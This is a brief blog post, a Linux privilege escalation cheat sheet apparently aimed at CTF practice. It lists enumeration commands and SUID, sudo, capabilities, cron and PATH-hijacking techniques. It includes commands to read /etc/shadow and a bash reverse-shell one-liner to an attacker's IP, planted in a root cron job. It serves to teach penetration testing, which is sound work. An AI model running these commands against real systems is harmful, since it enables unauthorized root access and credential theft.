Open in app

Sign in

Write

Sign in

Simple Linux Privilege Escalation Cheat Sheet

Omer Gunesacar
2 min readMar 11, 2023

--

These commands help us to enumarate the linux machine.

  1. hostname
  2. cat /proc version
  3. cat /etc/issue
  4. uname -a
  5. ps
  6. env
  7. sudo -l
  8. cat /etc/passwd and /etc/shadow
  9. history
  10. ifconfig
  11. netstat
  12. getcap
  13. cat /etc/crontab
  14. ip a s (ip address show)

find /home -name flag1.txt: find the file names “flag1.txt” in the /home directory

find / -type f -perm 0777: find files with the 777 permissions

find / -mtime 10: find files that were modified in the last 10 days

find / -writable 2>/dev/null: Writable Folders

Automated Enumaration Tools:

  1. LinPeas
  2. LinEnum
  3. Linux Smart Enumeration

Kernel Exploit

The Kernel exploit methodology;

  1. Find the kernel version
  2. Search for the exploit for the kernel version.
  3. Execute the exploit.

Sudo

  1. Look for application that allows us to run with root privileges (sudo -l)
  2. Look at the https://gtfobins.github.io/ for exploits

SUID

  1. “find / -type f -perm -04000 -ls 2>/dev/null” will list the files that have SUID or SGID bits set.
  2. Look to GTFOBins.
  3. Example: If nano has SUID bit set, “nano /etc/shadow” command will print the contens of /etc/shadow

Capabilities

  1. We can use the “getcap” tool to list enabled capabilities. → getcap -r /
  2. Look at the GTFOBins.

Cron Jobs

  1. Our goal is to find a cron job that is created by root and change it to run our script for getting a shell.
  2. Ex: if some python files are running as cron jobs, we can edit that file to give us root shell.
  3. #!bin/bash
    bash -i >& /dev/tcp/<IP of Attacker/<Port to Listen> 0>&1 (open a listener on host machine)

PATH

  1. Let’s look what folders are located under $PATH → echo $PATH
  2. Can we have the privilege to write that folder? → find / -writable 2>/dev/null | cut -d “/” -f 2 | sort -u
  3. Let’s say we can write to the tmp/ folder. → export PATH=/tmp:$PATH
  4. Let’s create a root shell file located at /tmp → echo “/bin/bash” > FILE
  5. Make that file readible, writable and executable for all users → chmod 777 FILE.
  6. If user1 executes this file, we have user1’s shell. If root executes, we r gonna have root shell.
Cybersecurity
Privilege Escalation
Linux

--

--

Omer Gunesacar
Omer Gunesacar

Written by Omer Gunesacar

2 Followers
12 Following

EE Engineer interested in Cyber Security.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams